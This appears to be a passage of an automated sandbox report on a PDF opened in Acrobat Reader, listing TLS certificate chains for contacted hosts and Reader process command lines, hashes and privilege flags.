                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.501624107 CEST151.101.1.195443192.168.2.349764CN=web.app CN=GTS CA 1D4, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GTS CA 1D4, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEWed May 19 23:19:33 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020Tue Aug 17 23:19:32 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=GTS CA 1D4, O=Google Trust Services LLC, C=USCN=GTS Root R1, O=Google Trust Services LLC, C=USThu Aug 13 02:00:42 CEST 2020Thu Sep 30 02:00:42 CEST 2027
                                                                                                                                                                                                                                                        CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Jun 19 02:00:42 CEST 2020Fri Jan 28 01:00:42 CET 2028
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:46.517654896 CEST151.101.1.195443192.168.2.349763CN=web.app CN=GTS CA 1D4, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GTS CA 1D4, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEWed May 19 23:19:33 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020Tue Aug 17 23:19:32 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=GTS CA 1D4, O=Google Trust Services LLC, C=USCN=GTS Root R1, O=Google Trust Services LLC, C=USThu Aug 13 02:00:42 CEST 2020Thu Sep 30 02:00:42 CEST 2027
                                                                                                                                                                                                                                                        CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Jun 19 02:00:42 CEST 2020Fri Jan 28 01:00:42 CET 2028
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.593715906 CEST104.16.123.175443192.168.2.349766CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESun Aug 02 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Mon Aug 02 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:48.597836971 CEST104.16.123.175443192.168.2.349765CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESun Aug 02 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Mon Aug 02 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.990483046 CEST13.224.187.69443192.168.2.349770CN=static.adobelogin.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Sep 18 02:00:00 CEST 2019 Fri Mar 08 13:00:00 CET 2013 Fri Nov 10 01:00:00 CET 2006Wed Sep 22 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:53.994195938 CEST13.224.187.69443192.168.2.349771CN=static.adobelogin.com, OU=IT, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Sep 18 02:00:00 CEST 2019 Fri Mar 08 13:00:00 CET 2013 Fri Nov 10 01:00:00 CET 2006Wed Sep 22 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                                                        CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.870266914 CEST104.16.148.64443192.168.2.349774CN=cookielaw.org, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jun 01 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Wed Jun 01 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:54.871398926 CEST104.16.148.64443192.168.2.349775CN=cookielaw.org, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jun 01 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Wed Jun 01 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.191051006 CEST104.20.184.68443192.168.2.349776CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.192495108 CEST104.20.184.68443192.168.2.349777CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.334273100 CEST63.33.31.50443192.168.2.349778CN=*.demdex.net, OU=Digital Marketing, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Dec 02 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006Mon Jan 03 00:59:59 CET 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                        CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.334438086 CEST63.33.31.50443192.168.2.349779CN=*.demdex.net, OU=Digital Marketing, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Dec 02 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006Mon Jan 03 00:59:59 CET 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                        CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.752432108 CEST15.236.176.210443192.168.2.349780CN=sstats.adobe.com, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon May 18 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Wed Aug 25 14:00:00 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,03faf2df7ab96c36419c31725cb1fa7d6
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:55.753108025 CEST15.236.176.210443192.168.2.349781CN=sstats.adobe.com, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon May 18 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013Wed Aug 25 14:00:00 CEST 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,03faf2df7ab96c36419c31725cb1fa7d6
                                                                                                                                                                                                                                                        CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.271931887 CEST13.225.74.37443192.168.2.349782CN=api.demandbase.com, O="Demandbase, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=C3920817, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USFri Oct 09 23:16:41 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Thu Oct 28 02:17:28 CEST 2021 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                                                        CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                                                        OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                                                                                                                                                        Jun 11, 2021 10:40:56.272965908 CEST13.225.74.37443192.168.2.349783CN=api.demandbase.com, O="Demandbase, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=C3920817, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USFri Oct 09 23:16:41 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Thu Oct 28 02:17:28 CEST 2021 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                        CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                                                                                                                        CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                                                                                                                        OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:39:06
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\Tribeca Investment Partners - Funds.pdf'
                                                                                                                                                                                                                                                        Imagebase:0x2c0000
                                                                                                                                                                                                                                                        File size:2571312 bytes
                                                                                                                                                                                                                                                        MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:39:07
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\Tribeca Investment Partners - Funds.pdf'
                                                                                                                                                                                                                                                        Imagebase:0x2c0000
                                                                                                                                                                                                                                                        File size:2571312 bytes
                                                                                                                                                                                                                                                        MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:39:14
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043
                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                        File size:9475120 bytes
                                                                                                                                                                                                                                                        MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:39:16
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18176514141952179124 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18176514141952179124 --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                        File size:9475120 bytes
                                                                                                                                                                                                                                                        MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:39:18
                                                                                                                                                                                                                                                        Start date:11/06/2021
                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --service-request-channel-token=14323790637429607960 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                        File size:9475120 bytes
                                                                                                                                                                                                                                                        MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Start time:10:39:20
                                                                                                                                                                                                                                                        Start date:11/06/2021
